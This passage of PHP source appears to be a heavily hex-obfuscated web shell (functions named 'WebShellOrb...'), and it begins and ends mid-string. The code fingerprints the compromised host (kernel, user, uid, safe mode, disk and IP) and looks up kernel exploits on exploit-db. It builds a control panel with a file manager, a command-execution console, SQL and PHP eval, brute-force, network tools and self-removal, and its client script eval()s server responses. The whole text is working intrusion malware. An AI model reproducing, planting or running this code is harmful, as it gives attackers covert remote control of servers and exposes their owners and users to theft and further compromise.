\x74\x72:\x68over{\x62ack\x67ro\x75\x6ed-c\x6f\x6c\x6f\x72:\x23\x35e\x35e5e}\n\x2e\x6c1{b\x61ck\x67r\x6f\x75\x6ed-c\x6f\x6cor:#\x344\x34}\n\x2el2{\x62\x61\x63k\x67r\x6f\x75nd-c\x6flo\x72:\x23\x33\x333}\npr\x65{f\x6fn\x74-\x66\x61\x6di\x6c\x79:C\x6f\x75r\x69\x65r,M\x6f\x6e\x6fs\x70\x61ce\x3b}\n\x3c/\x73\x74y\x6ce\x3e\n\x3csc\x72\x69\x70\x74>\n\x20 \x20\x20v\x61r\x20c_ = \x27" . htmlspecialchars($GLOBALS["\x63w\x64"]) . "';\n \x20\x20\x20\x76\x61r a\x5f\x20=\x20'" . htmlspecialchars(@$_POST["a"]) . "\x27\n\x20 v\x61r char\x73et_ \x3d\x20'" . htmlspecialchars(@$_POST["\x63ha\x72s\x65\x74"]) . "\x27;\n var\x20\x701\x5f = \x27" . ((strpos(@$_POST["p\x31"], "\n") !== false) ? "" : htmlspecialchars($_POST["\x70\x31"], ENT_QUOTES)) . "\x27\x3b\n \x20 \x76\x61\x72 \x702_\x20\x3d\x20'" . ((strpos(@$_POST["\x702"], "\n") !== false) ? "" : htmlspecialchars($_POST["\x70\x32"], ENT_QUOTES)) . "'\x3b\n\x20\x20 \x76a\x72 \x70\x33\x5f\x20\x3d \x27" . ((strpos(@$_POST["\x703"], "\n") !== false) ? "" : htmlspecialchars($_POST["\x703"], ENT_QUOTES)) . "';\n \x20 \x20\x76a\x72 \x64 =\x20d\x6f\x63u\x6de\x6e\x74\x3b\n\tf\x75n\x63ti\x6fn s\x65\x74(\x61,c,p1,\x702,\x703,ch\x61r\x73\x65\x74) {\n\t\t\x69\x66(\x61!\x3d\x6e\x75\x6cl)d.mf\x2ea\x2eva\x6cu\x65\x3d\x61;el\x73e \x64.\x6d\x66.\x61\x2e\x76a\x6cu\x65=\x61_\x3b\n\t\ti\x66(\x63\x21\x3d\x6eu\x6c\x6c)\x64.m\x66\x2e\x63\x2ev\x61lue\x3dc;e\x6c\x73e \x64.\x6d\x66.c\x2ev\x61\x6cue=c\x5f;\n\t\t\x69f(\x70\x31!=nul\x6c)\x64.\x6d\x66\x2e\x701.va\x6c\x75\x65=p\x31;else\x20\x64.mf\x2ep1.\x76\x61l\x75\x65\x3d\x70\x31_;\n\t\tif(\x70\x32\x21=\x6eul\x6c)d\x2e\x6d\x66.\x70\x32\x2ev\x61l\x75\x65=\x70\x32;el\x73e\x20\x64.\x6d\x66.\x702\x2eval\x75e=p\x32_;\n\t\t\x69f(\x703\x21\x3dnul\x6c)\x64.mf\x2ep3\x2eva\x6cu\x65=\x703\x3be\x6c\x73e d.\x6df\x2ep\x33\x2ev\x61l\x75\x65=p\x33\x5f;\n\t\t\x69f(c\x68\x61rs\x65\x74\x21\x3dnul\x6c)d\x2e\x6d\x66\x2ec\x68ar\x73\x65t.\x76\x61l\x75\x65=c\x68a\x72s\x65\x74\x3bel\x73\x65\x20\x64\x2e\x6df\x2echa\x72s\x65\x74.\x76alu\x65=\x63har\x73\x65t\x5f;\n\t\t//\x69\x66(c\x68\x61\x72\x73e\x74!=\x6eul\x6c)\x64.\x6df.c\x68\x61r\x73\x65t\x2e\x76a\x6cu\x65=ch\x61\x72\x73\x65\x74\x3bel\x73e \x64\x2e\x6df.c\x68\x61r\x73\x65\x74\x2e\x76\x61lu\x65\x3dcha\x72\x73et\x5f\x3b\n\t}\n\t\x66unct\x69\x6f\x6e \x67(a,c,\x701,\x702,\x703,ch\x61\x72\x73\x65t)\x20{\n\t\ts\x65\x74(\x61,c,\x70\x31,p2,\x70\x33,cha\x72\x73\x65t)\x3b\n\t\td.\x6d\x66.\x73\x75bmit();\n\t}\n\tfunc\x74\x69o\x6e \x61(a,c,p\x31,p\x32,\x703,\x63\x68\x61\x72\x73\x65t) {\n\t\ts\x65\x74(\x61,\x63,p1,p\x32,\x70\x33,c\x68\x61\x72s\x65\x74)\x3b\n\t\t\x76ar \x70a\x72\x61m\x73 = '\x61\x6a\x61x\x3dtrue\x27;\n\t\t\x66o\x72(i\x3d\x30\x3bi\x3c\x64.m\x66\x2e\x65l\x65\x6d\x65\x6et\x73\x2e\x6c\x65ngt\x68;i++)\n\t\t\t\x70\x61ra\x6ds\x20+\x3d \x27\x26\x27+\x64\x2e\x6d\x66.elements[\x69].n\x61m\x65+\x27\x3d'+en\x63\x6fdeUR\x49Co\x6d\x70on\x65nt(d\x2emf\x2ee\x6c\x65me\x6ets[i].\x76\x61lue)\x3b\n\t\t\x73r(\x27" . addslashes($_SERVER["RE\x51U\x45\x53T_\x55RI"]) . "', \x70\x61r\x61\x6d\x73);\n\t}\n\tf\x75n\x63\x74ion s\x72(\x75r\x6c,\x20p\x61r\x61\x6d\x73) {\n\t\t\x69f (window.X\x4dL\x48t\x74p\x52\x65ques\x74)\n\t\t\tr\x65q\x20\x3d\x20\x6e\x65w XML\x48t\x74p\x52\x65\x71\x75es\x74()\x3b\n\t\telse\x20i\x66\x20(w\x69ndow.Act\x69\x76eXO\x62je\x63\x74)\n\t\t\treq\x20=\x20\x6eew\x20Acti\x76eXObj\x65\x63\x74(\x27Micr\x6fs\x6f\x66\x74\x2e\x58ML\x48\x54TP\x27);\n \x20 \x20\x20 \x69f\x20(\x72eq) {\n \x20\x20\x20\x20 \x20\x20\x20 \x72\x65\x71\x2eo\x6e\x72e\x61dy\x73tat\x65ch\x61nge\x20= p\x72\x6fc\x65\x73s\x52eqCh\x61n\x67\x65;\n\x20 \x20\x20\x20\x20\x20\x20\x20\x20 \x20\x72eq\x2e\x6f\x70\x65n('P\x4fST\x27, \x75r\x6c,\x20t\x72\x75e)\x3b\n\x20 \x20 \x20\x20 \x20\x20re\x71.se\x74\x52\x65que\x73tH\x65\x61\x64\x65r ('C\x6f\x6et\x65\x6e\x74-T\x79pe',\x20'\x61pp\x6ci\x63\x61\x74\x69\x6f\x6e/\x78-w\x77\x77-\x66\x6fr\x6d-ur\x6c\x65\x6e\x63od\x65\x64\x27);\n \x20\x20 \x20\x20\x20\x20 \x20 re\x71\x2ese\x6ed(para\x6d\x73);\n \x20 \x20\x20 }\n\t}\n\t\x66uncti\x6fn p\x72oc\x65s\x73\x52eqC\x68\x61ng\x65() {\n\t\t\x69f(\x20(re\x71\x2e\x72\x65a\x64\x79S\x74ate\x20==\x20\x34)\x20)\n\t\t\t\x69\x66(\x72eq.\x73\x74\x61t\x75\x73\x20=\x3d\x20\x3200)\x20{\n\t\t\t\t\x76\x61r reg \x3d\x20new RegExp(\x22(\x5c\\\x64+)([\x5c\x5c\x53\x5c\\\x73]*)\",\x20\x27\x6d\x27)\x3b\n\t\t\t\tva\x72\x20\x61rr=reg\x2eex\x65\x63(re\x71\x2e\x72e\x73\x70\x6fn\x73e\x54ext);\n\t\t\t\t\x65\x76a\x6c(a\x72\x72[2]\x2e\x73ub\x73t\x72(\x30, a\x72r[\x31]))\x3b\n\t\t\t}\x20e\x6cse\x20\x61\x6cer\x74('Re\x71u\x65st\x20\x65\x72r\x6fr!\x27)\x3b\n\t}\n</\x73\x63ri\x70\x74\x3e\n\x3ch\x65\x61\x64>\x3c\x62o\x64\x79><di\x76\x20\x73t\x79\x6ce='\x70\x6f\x73\x69\x74io\x6e:ab\x73o\x6cut\x65;w\x69dth:10\x30\x25;\x62a\x63\x6b\x67r\x6f\x75\x6ed-co\x6c\x6f\x72:#44\x34\x3bt\x6f\x70:0\x3bl\x65\x66\x74:\x30;\x27\x3e\n\x3cfo\x72\x6d \x6d\x65\x74hod\x3dp\x6fs\x74 \x6e\x61\x6d\x65\x3d\x6d\x66\x20\x73t\x79\x6ce\x3d\x27\x64is\x70\x6ca\x79:non\x65;\x27\x3e\n<\x69\x6epu\x74 \x74\x79\x70\x65\x3dh\x69\x64d\x65n \x6e\x61\x6de=\x61\x3e\n\x3c\x69n\x70u\x74 \x74yp\x65\x3d\x68id\x64\x65n n\x61m\x65=\x63>\n<\x69nput\x20\x74y\x70e=\x68i\x64d\x65n\x20n\x61\x6de=p1>\n\x3c\x69\x6e\x70\x75\x74\x20\x74y\x70\x65\x3dh\x69dde\x6e \x6eame\x3dp2>\n\x3c\x69n\x70ut\x20t\x79p\x65=hi\x64\x64\x65n\x20n\x61\x6d\x65\x3dp\x33\x3e\n\x3ci\x6e\x70\x75\x74 \x74ype\x3dhidd\x65n name=\x63\x68\x61rse\x74>\n</f\x6fr\x6d\x3e";
$xfernkifiv = "\x6b\x65\x72n\x65\x6c";
${${"\x47\x4cO\x42\x41\x4c\x53"}["\x6c\x66\x63d\x68xi\x71\x72\x6a\x75\x63"]} = @diskfreespace($GLOBALS["\x63wd"]);
${${"G\x4cO\x42\x41\x4cS"}["m\x74mc\x67\x62\x75\x78\x73\x74\x6a"]} = @disk_total_space($GLOBALS["cwd"]);
${${"G\x4cO\x42\x41\x4c\x53"}["\x71\x68\x67\x6e\x6cj\x77\x73"]} = ${${"\x47LO\x42\x41\x4c\x53"}["\x6dtm\x63\x67b\x75\x78\x73t\x6a"]} ? ${${"G\x4cOBA\x4cS"}["\x6d\x74m\x63gb\x75\x78\x73\x74\x6a"]} : 1;
$wjslkgig = "\x63\x68\x61rs\x65\x74s";
${$fnmpbhsrxkxs} = @php_uname("r");
${$xfernkifiv} = @php_uname("\x73");
${"G\x4c\x4fBA\x4cS"}["de\x76r\x63\x79\x77e\x78\x63e"] = "\x69";
${${"GL\x4f\x42A\x4c\x53"}["\x70\x61\x61\x6cl\x79\x77k\x69"]} = "\x68t\x74p\x73://\x77\x77w\x2ee\x78\x70\x6c\x6fit-d\x62.\x63\x6f\x6d/\x73earc\x68?q=";
if (strpos("\x4c\x69\x6eux", ${${"G\x4c\x4f\x42\x41\x4cS"}["\x76\x67ko\x6e\x69\x7a\x71"]}) !== false)
${${"\x47\x4c\x4fB\x41\x4c\x53"}["\x62\x78\x79\x6f\x79\x74pr\x64"]} .= urlencode("\x4cin\x75x\x20\x4b\x65\x72n\x65\x6c " . substr(${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["c\x63\x6fxzy\x6a\x76"]}, 0, 6));
else
${${"G\x4cO\x42\x41\x4c\x53"}["b\x78\x79\x6fytp\x72\x64"]} .= urlencode(${${"\x47\x4c\x4fB\x41\x4cS"}["\x76\x67\x6b\x6f\x6ei\x7a\x71"]} . " " . substr(${$unibgzq}, 0, 3));
$yuriqttm = "\x70\x61\x74\x68";
$dapwvlq = "\x6e";
${"\x47L\x4f\x42A\x4c\x53"}["cd\x6f\x76\x66z\x66g\x70"] = "\x6de\x6e\x75";
if (!function_exists("p\x6fs\x69x\x5fgete\x67\x69\x64")) {
${"G\x4c\x4f\x42\x41\x4c\x53"}["jv\x78s\x69\x71\x71u"] = "\x75id";
$aiyfiiwq = "u\x73\x65r";
${$aiyfiiwq} = @get_current_user();
${${"\x47\x4c\x4fBA\x4cS"}["\x6av\x78\x73\x69\x71q\x75"]} = @getmyuid();
${${"\x47\x4c\x4fBAL\x53"}["e\x6c\x6b\x79\x78m\x69y\x75"]} = @getmygid();
${${"G\x4cOB\x41\x4c\x53"}["u\x79rz\x66\x75\x62\x6a\x6c"]} = "?";
} else {
$hnryuak = "g\x69\x64";
$lzwmbumx = "uid";
${$lzwmbumx} = @posix_getpwuid(posix_geteuid());
${$hnryuak} = @posix_getgrgid(posix_getegid());
${"\x47\x4c\x4fBAL\x53"}["\x74\x75f\x76\x77q"] = "\x67\x69\x64";
${"G\x4cOBA\x4c\x53"}["m\x65\x6a\x78\x69\x62\x68"] = "\x67\x69\x64";
${${"\x47\x4c\x4f\x42\x41LS"}["hx\x68\x66\x62\x66lhzl\x74"]} = ${${"\x47\x4c\x4f\x42\x41L\x53"}["gk\x6a\x79r\x7a\x78ng"]}["nam\x65"];
${${"\x47L\x4f\x42\x41\x4c\x53"}["g\x6bjyrz\x78\x6e\x67"]} = ${${"GL\x4f\x42\x41L\x53"}["\x67kj\x79r\x7a\x78\x6eg"]}["u\x69\x64"];
${${"\x47\x4cO\x42\x41\x4cS"}["u\x79\x72z\x66u\x62\x6a\x6c"]} = ${${"\x47L\x4f\x42\x41\x4cS"}["\x65lky\x78\x6d\x69\x79\x75"]}["\x6ea\x6de"];
${${"\x47LOB\x41\x4c\x53"}["t\x75\x66vw\x71"]} = ${${"\x47\x4c\x4fB\x41\x4cS"}["\x6d\x65j\x78\x69bh"]}["gi\x64"];
}
${"\x47\x4c\x4fBALS"}["\x79k\x69e\x6d\x68\x6eo"] = "\x6d";
${${"\x47LO\x42\x41\x4c\x53"}["q\x75m\x72c\x65\x7a"]} = "";
${$yuriqttm} = explode("/", $GLOBALS["\x63\x77\x64"]);
$yxdvqicqjzi = "\x6d";
${"\x47\x4c\x4fB\x41L\x53"}["\x69\x65t\x63\x75\x6b\x6e"] = "\x63\x77d\x5f\x6c\x69\x6e\x6b\x73";
${$dapwvlq} = count(${$jeuwvfj});
for (${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["d\x65\x76\x72c\x79w\x65\x78c\x65"]} = 0; ${$cvyfemar} < ${$mzcbhnv} - 1; ${${"\x47\x4c\x4f\x42A\x4c\x53"}["\x63\x6ck\x75\x79\x6fjj"]}++) {
${"GL\x4fB\x41\x4cS"}["\x75r\x66\x66\x6a\x6ddujb\x73"] = "\x63\x77d\x5f\x6c\x69\x6ek\x73";
$nubocyjtuqn = "\x6a";
${"\x47\x4cO\x42A\x4cS"}["g\x75\x61\x6d\x65\x63wi"] = "j";
$iyjeuqvfrl = "\x63wd\x5fl\x69\x6ek\x73";
${${"\x47\x4cO\x42\x41L\x53"}["q\x75m\x72ce\x7a"]} .= "\x3c\x61 hre\x66\x3d'#' \x6fnc\x6cick\x3d'\x67(\"F\x69l\x65sM\x61n\x22,\x22";
${"\x47\x4c\x4f\x42A\x4cS"}["\x70z\x69\x73\x70\x6c\x67\x67\x69\x63"] = "\x69";
for (${$nubocyjtuqn} = 0; ${${"GL\x4f\x42\x41\x4c\x53"}["\x72x\x67\x74d\x64\x73\x7awq\x6e\x72"]} <= ${${"\x47L\x4f\x42\x41\x4c\x53"}["\x63l\x6buy\x6f\x6aj"]}; ${${"GL\x4f\x42\x41\x4c\x53"}["\x72\x78\x67tdd\x73z\x77\x71\x6e\x72"]}++)
${${"\x47LOBAL\x53"}["ur\x66\x66\x6amd\x75\x6a\x62\x73"]} .= ${${"\x47\x4c\x4fBA\x4c\x53"}["\x66f\x73\x77\x6c\x68\x61b"]}[${${"\x47L\x4f\x42A\x4cS"}["\x67u\x61mec\x77\x69"]}] . "/";
${$iyjeuqvfrl} .= "\")\x27>" . ${${"GL\x4f\x42\x41\x4c\x53"}["\x66\x66\x73\x77\x6c\x68a\x62"]}[${${"G\x4c\x4fB\x41\x4c\x53"}["p\x7a\x69\x73\x70\x6c\x67gic"]}] . "/</\x61>";
}
${$ylknujmswar} = array(
"U\x54F-8",
"\x57\x69\x6edo\x77\x73-\x31251",
"KOI8-\x52",
"K\x4f\x49\x38-U",
"\x63\x70\x38\x366"
);
${${"G\x4c\x4f\x42AL\x53"}["\x6d\x67\x76k\x78gcmo\x66\x79\x72"]} = "";
$amhhbx = "f\x72ee\x53\x70\x61c\x65";
foreach (${$wjslkgig} as ${${"\x47L\x4fB\x41LS"}["\x72\x74z\x67\x76i\x77"]})
${${"\x47\x4c\x4f\x42\x41L\x53"}["\x6d\x67v\x6b\x78\x67\x63m\x6f\x66\x79\x72"]} .= "<\x6fpti\x6f\x6e \x76a\x6c\x75e\x3d\"" . ${$unjshhsygx} . "\x22\x20" . ($_POST["\x63h\x61\x72\x73e\x74"] == ${${"\x47LO\x42\x41L\x53"}["bdmqwqv\x66q\x6e"]} ? "s\x65\x6c\x65c\x74e\x64" : "") . ">" . ${${"\x47L\x4fB\x41\x4cS"}["\x62\x64\x6d\x71\x77q\x76\x66\x71\x6e"]} . "</o\x70t\x69o\x6e>";
${${"\x47\x4cOB\x41L\x53"}["\x66\x73\x6b\x71\x6f\x77\x79o\x76p\x6b"]} = array(
"S\x65\x63\x2e\x20I\x6e\x66\x6f" => "S\x65c\x49\x6e\x66\x6f",
"\x46i\x6c\x65s" => "\x46il\x65\x73M\x61\x6e",
"Co\x6es\x6fle" => "\x43o\x6e\x73\x6f\x6ce",
"\x53\x71l" => "\x53ql",
"\x50h\x70" => "P\x68p",
"S\x74r\x69ng \x74\x6fols" => "S\x74\x72in\x67\x54oo\x6cs",
"B\x72ut\x65f\x6f\x72\x63e" => "B\x72\x75\x74e\x66o\x72\x63e",
"Ne\x74\x77\x6f\x72\x6b" => "\x4eet\x77\x6frk"
);
$fqtoyg = "dr\x69\x76e\x73";
if (!empty($GLOBALS["\x61\x75t\x68\x5f\x70\x61ss"]))
${${"G\x4c\x4fBA\x4c\x53"}["\x66\x73\x6bq\x6fw\x79\x6f\x76\x70\x6b"]}["\x4c\x6fg\x6f\x75\x74"] = "\x4c\x6f\x67\x6f\x75\x74";
${$yxdvqicqjzi}["\x53elf r\x65m\x6f\x76\x65"] = "S\x65\x6cf\x52e\x6dov\x65";
${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["w\x77\x74fg\x63\x64\x64f"]} = "";
foreach (${${"GLOB\x41\x4c\x53"}["\x66\x73k\x71\x6f\x77\x79\x6f\x76\x70k"]} as ${${"\x47LOBAL\x53"}["o\x71vr\x79x\x65"]} => ${${"GL\x4fBA\x4cS"}["\x76v\x64\x78m\x6a\x62\x67\x65\x63"]})
${${"\x47\x4c\x4fB\x41LS"}["\x63\x64o\x76f\x7af\x67\x70"]} .= "\x3c\x74h wi\x64\x74h\x3d\x22" . (int) (100 / count(${${"\x47\x4cO\x42\x41\x4cS"}["\x79\x6bi\x65\x6dh\x6eo"]})) . "%\x22\x3e[\x20\x3ca\x20\x68\x72e\x66\x3d\x22#\x22\x20o\x6ecli\x63k\x3d\"g('" . ${$gigkkylcom} . "\x27,\x6eull,\x27','',\x27\x27)\">" . ${${"\x47\x4c\x4fB\x41\x4cS"}["r\x72\x73\x61\x79e\x6fv"]} . "</a>\x20]\x3c/t\x68>";
${${"\x47L\x4f\x42\x41\x4c\x53"}["\x6ffhw\x73m\x6d\x6d"]} = "";
if ($GLOBALS["o\x73"] == "\x77\x69\x6e") {
${"\x47L\x4fBA\x4c\x53"}["b\x66e\x70\x6c\x61\x61\x78\x67"] = "\x64r\x69ve";
foreach (range("c", "z") as ${${"\x47\x4c\x4fB\x41L\x53"}["b\x66\x65\x70l\x61a\x78\x67"]}) {
${"\x47L\x4f\x42A\x4cS"}["j\x69\x6c\x6f\x67p\x67"] = "dr\x69ve";
if (is_dir(${${"\x47\x4cO\x42\x41\x4c\x53"}["\x63b\x6c\x77\x73\x66\x73rx\x64\x77"]} . ":\\"))
${${"\x47\x4c\x4fBA\x4c\x53"}["o\x66h\x77\x73\x6d\x6dm"]} .= "\x3ca \x68\x72\x65\x66\x3d\x22\x23\" o\x6ec\x6c\x69c\x6b=\"\x67('Fi\x6ces\x4da\x6e\x27,'" . ${${"\x47\x4c\x4f\x42\x41\x4cS"}["cblwsf\x73\x72\x78d\x77"]} . ":/\x27)\x22>[\x20" . ${${"\x47L\x4f\x42\x41\x4c\x53"}["\x6ai\x6c\x6f\x67p\x67"]} . "\x20]</a\x3e\x20";
}
}
echo "<table \x63l\x61ss=\x69\x6e\x66o \x63e\x6c\x6c\x70ad\x64\x69ng\x3d\x33 \x63\x65\x6c\x6cspa\x63\x69n\x67\x3d\x30 \x77idth=1\x30\x30%><\x74\x72\x3e\x3ctd\x20\x77\x69\x64\x74h\x3d\x31><sp\x61n\x3e\x55n\x61m\x65:\x3c\x62\x72\x3e\x55\x73er:<\x62\x72>P\x68p:\x3c\x62r\x3eHd\x64:\x3cb\x72\x3e\x43\x77\x64:" . ($GLOBALS["os"] == "\x77\x69\x6e" ? "<b\x72\x3eDr\x69v\x65s:" : "") . "\x3c/s\x70\x61n></t\x64\x3e" . "<t\x64>\x3cno\x62\x72\x3e" . substr(@php_uname(), 0, 120) . " \x3c/\x6e\x6fb\x72\x3e<\x62\x72\x3e" . ${$syynptc} . " ( " . ${${"GL\x4fB\x41\x4c\x53"}["tlm\x71\x79\x73b\x6a"]} . " ) <s\x70\x61\x6e>\x47ro\x75p:</s\x70an\x3e\x20" . ${${"\x47\x4c\x4f\x42A\x4cS"}["e\x6c\x6b\x79x\x6d\x69y\x75"]} . "\x20( " . ${${"G\x4c\x4f\x42\x41\x4cS"}["\x75\x79rz\x66\x75\x62jl"]} . "\x20)<\x62\x72>" . @phpversion() . " <\x73pan>Sa\x66e \x6do\x64e:\x3c/spa\x6e> " . ($GLOBALS["s\x61\x66e_\x6do\x64\x65"] ? "<\x66o\x6et\x20colo\x72=re\x64>\x4fN</\x66\x6fn\x74\x3e" : "\x3cf\x6f\x6et \x63o\x6c\x6fr=g\x72\x65\x65n>\x3c\x62\x3e\x4fFF</\x62></\x66ont>") . "\x20<a hr\x65\x66\x3d\x23 onc\x6c\x69c\x6b\x3d\x22\x67('P\x68\x70\x27,\x6e\x75ll,\x27','info\x27)\"\x3e[ \x70hp\x69\x6e\x66o\x20]\x3c/a> <\x73\x70a\x6e>Da\x74e\x74\x69\x6de:\x3c/s\x70\x61n\x3e " . date("Y-\x6d-\x64\x20H:\x69:s") . "<\x62\x72>" . WebShellOrbViewSize(${${"G\x4c\x4f\x42AL\x53"}["\x6dtmcg\x62\x75x\x73\x74\x6a"]}) . "\x20<span\x3e\x46\x72\x65\x65:\x3c/\x73pa\x6e> " . WebShellOrbViewSize(${$amhhbx}) . " (" . (int) (${${"\x47\x4c\x4f\x42\x41\x4cS"}["\x70lyu\x6c\x68\x69\x75\x72o"]} / ${${"\x47L\x4f\x42\x41\x4c\x53"}["\x6d\x74\x6dc\x67\x62\x75xs\x74\x6a"]} * 100) . "%)\x3cbr>" . ${${"\x47\x4c\x4f\x42\x41L\x53"}["i\x65\x74\x63\x75\x6b\x6e"]} . "\x20" . WebShellOrbPermsColor($GLOBALS["\x63\x77\x64"]) . " <a\x20\x68\x72\x65\x66\x3d# o\x6e\x63l\x69c\x6b\x3d\"g(\x27F\x69\x6c\x65sM\x61n\x27,\x27" . $GLOBALS["\x68o\x6d\x65_c\x77\x64"] . "','\x27,'','')\x22\x3e[ \x68\x6fm\x65\x20]</\x61\x3e<br\x3e" . ${$fqtoyg} . "\x3c/td>" . "\x3c\x74\x64\x20\x77\x69d\x74h\x3d\x31\x20\x61lig\x6e=ri\x67ht>\x3c\x6e\x6fbr\x3e<se\x6ce\x63t \x6f\x6e\x63ha\x6e\x67e=\"g(\x6eull,\x6e\x75ll,nu\x6cl,\x6eu\x6c\x6c,\x6e\x75\x6c\x6c,th\x69s\x2ev\x61lue)\"><\x6fp\x74\x67ro\x75\x70 l\x61be\x6c\x3d\x22Pa\x67e\x20\x63ha\x72\x73\x65t\">" . ${${"\x47L\x4f\x42ALS"}["\x6d\x67\x76\x6b\x78\x67\x63m\x6f\x66\x79\x72"]} . "</o\x70\x74g\x72\x6fup>\x3c/s\x65l\x65c\x74\x3e<br\x3e<sp\x61\x6e\x3eSe\x72v\x65\x72 IP:</\x73pan><br\x3e" . @$_SERVER["S\x45R\x56ER_\x41\x44D\x52"] . "<b\x72><\x73\x70\x61\x6e\x3e\x43\x6c\x69en\x74\x20IP:</spa\x6e>\x3cb\x72\x3e" . $_SERVER["\x52E\x4d\x4f\x54\x45_\x41\x44\x44R"] . "</\x6e\x6f\x62\x72></t\x64>\x3c/t\x72></tab\x6ce\x3e" . "\x3c\x74ab\x6ce\x20st\x79\x6c\x65\x3d\x22\x62or\x64\x65r-\x74o\x70:2px \x73\x6f\x6cid #3\x333\x3b\" \x63\x65llpaddi\x6eg\x3d3 \x63\x65\x6cl\x73\x70\x61\x63\x69\x6eg=\x30 w\x69\x64th=\x3100%\x3e<\x74\x72\x3e" . ${${"\x47LO\x42\x41\x4cS"}["\x77w\x74\x66g\x63\x64\x64\x66"]} . "</t\x72></tab\x6c\x65>\x3c\x64iv \x73\x74y\x6c\x65\x3d\x22\x6dar\x67in:5\x22\x3e";
}
function WebShellOrbFooter()
{
${${"\x47L\x4f\x42\x41\x4cS"}["\x62\x72v\x6a\x6de"]} = is_writable($GLOBALS["\x63\x77d"]) ? " <font\x20\x63\x6flor=\x27gre\x65\x6e\x27>(\x57\x72i\x74eab\x6ce)</f\x6f\x6e\x74\x3e" : "\x20\x3c\x66ont\x20\x63\x6flor\x3dred\x3e(\x4eo\x74 wr\x69\x74\x61b\x6c\x65)</\x66\x6fn\x74\x3e";
echo "\n</d\x69v\x3e\n\x3c\x74\x61bl\x65 \x63\x6cas\x73\x3di\x6efo\x20i\x64=\x74\x6fo\x6csT\x62\x6c\x20c\x65l\x6cpadd\x69\x6e\x67=\x33 c\x65\x6c\x6c\x73\x70\x61\x63ing\x3d\x30\x20\x77idt\x68=\x3100\x25\x20\x20s\x74y\x6ce\x3d'bor\x64\x65\x72-\x74\x6fp:2\x70\x78\x20\x73\x6fl\x69\x64\x20#\x333\x33\x3b\x62order-\x62ot\x74\x6f\x6d:2\x70\x78 s\x6f\x6cid\x20\x233\x333;\x27>\n\t<t\x72>\n\t\t<\x74d><f\x6f\x72m\x20o\x6e\x73\x75b\x6dit=\x27\x67(\x6e\x75ll,t\x68\x69\x73\x2e\x63\x2eva\x6c\x75e,\"\x22);\x72etu\x72n\x20f\x61ls\x65;'\x3e\x3c\x73\x70a\x6e\x3eC\x68\x61\x6ege \x64i\x72:\x3c/\x73\x70a\x6e>\x3c\x62\x72\x3e<inpu\x74 \x63\x6ca\x73\x73='\x74\x6fo\x6c\x73\x49np' t\x79pe=\x74\x65x\x74 n\x61me\x3d\x63 \x76\x61l\x75e\x3d'" . htmlspecialchars($GLOBALS["c\x77d"]) . "\x27><i\x6e\x70u\x74 \x74yp\x65=\x73u\x62m\x69t\x20v\x61lue\x3d\x27\x3e\x3e\x27></form></td\x3e\n\t\t\x3c\x74\x64>\x3c\x66o\x72\x6d ons\x75\x62mit\x3d\x22g('F\x69\x6ce\x73\x54\x6f\x6f\x6c\x73\x27,\x6eu\x6c\x6c,th\x69s.\x66\x2eval\x75\x65);\x72\x65\x74u\x72n fals\x65\x3b\x22\x3e<s\x70\x61\x6e\x3e\x52\x65\x61d\x20\x66i\x6ce:</spa\x6e><b\x72\x3e\x3c\x69nput\x20c\x6c\x61\x73\x73\x3d\x27too\x6c\x73\x49\x6ep\x27\x20t\x79pe=\x74\x65\x78t\x20\x6e\x61\x6de\x3d\x66><inp\x75t\x20t\x79pe\x3d\x73u\x62m\x69t\x20\x76al\x75e\x3d'>>\x27\x3e\x3c/\x66o\x72\x6d>\x3c/td>\n\t</tr\x3e<\x74\x72\x3e\n\t\t\x3c\x74d\x3e<f\x6frm \x6f\x6e\x73ubm\x69\x74\x3d\"\x67(\x27\x46\x69l\x65sM\x61n\x27,n\x75l\x6c,'m\x6b\x64ir\x27,t\x68i\x73\x2e\x64\x2e\x76\x61lu\x65)\x3b\x72\x65\x74u\x72n \x66a\x6cs\x65;\x22\x3e<s\x70\x61\x6e>Ma\x6be\x20dir:\x3c/s\x70a\x6e\x3e$is_writable\x3c\x62\x72>\x3c\x69\x6eput c\x6ca\x73s\x3d\x27to\x6f\x6cs\x49n\x70\x27\x20\x74\x79p\x65=\x74e\x78\x74 \x6eam\x65\x3d\x64>\x3c\x69\x6e\x70ut\x20\x74yp\x65=\x73u\x62\x6di\x74 v\x61lu\x65=\x27\x3e>'\x3e\x3c/fo\x72\x6d\x3e</\x74d>\n\t\t<\x74\x64>\x3cfor\x6d\x20o\x6e\x73u\x62m\x69\x74\x3d\"\x67('\x46i\x6cesT\x6f\x6fl\x73\x27,\x6e\x75\x6c\x6c,th\x69s\x2ef\x2eva\x6c\x75\x65,'\x6d\x6bf\x69\x6c\x65');r\x65tur\x6e\x20\x66\x61\x6c\x73\x65\x3b\"\x3e<\x73\x70an>M\x61\x6be \x66ile:\x3c/s\x70\x61\x6e\x3e$is_writable<\x62\x72>\x3c\x69\x6ep\x75t \x63la\x73s=\x27\x74o\x6f\x6csIn\x70'\x20\x74y\x70\x65\x3d\x74\x65\x78\x74 \x6ea\x6d\x65=f\x3e\x3cin\x70\x75\x74 \x74\x79\x70\x65=\x73\x75\x62mit\x20\x76\x61lu\x65\x3d'>\x3e'\x3e\x3c/\x66\x6f\x72m>\x3c/td>\n\t\x3c/tr><tr>\n\t\t\x3ct\x64>\x3c\x66\x6frm\x20onsubm\x69\x74\x3d\x22g(\x27\x43\x6f\x6es\x6f\x6ce\x27,nu\x6c\x6c,t\x68i\x73\x2ec\x2e\x76\x61\x6cue)\x3bret\x75\x72\x6e\x20fal\x73e\x3b\"\x3e<sp\x61n>\x45\x78ecut\x65:</\x73pa\x6e\x3e\x3c\x62\x72\x3e<input\x20c\x6c\x61\x73s\x3d\x27too\x6c\x73Inp\x27\x20\x74\x79p\x65=\x74\x65xt\x20\x6eame\x3d\x63\x20\x76\x61\x6cu\x65\x3d\x27'><\x69np\x75\x74\x20\x74yp\x65\x3ds\x75bm\x69t\x20\x76\x61lue='>>'></fo\x72\x6d\x3e\x3c/t\x64>\n\t\t<t\x64>\x3cfo\x72\x6d\x20\x6d\x65\x74\x68o\x64=\x27\x70o\x73t'\x20\x45\x4eC\x54\x59\x50\x45='\x6d\x75\x6c\x74\x69p\x61rt/\x66orm-\x64at\x61'\x3e\n\t\t<\x69n\x70ut \x74\x79\x70e\x3d\x68\x69d\x64e\x6e\x20na\x6d\x65\x3da v\x61l\x75e=\x27F\x69\x6ce\x73MAn\x27>\n\t\t<inpu\x74 t\x79\x70e\x3d\x68id\x64\x65\x6e\x20na\x6de=\x63 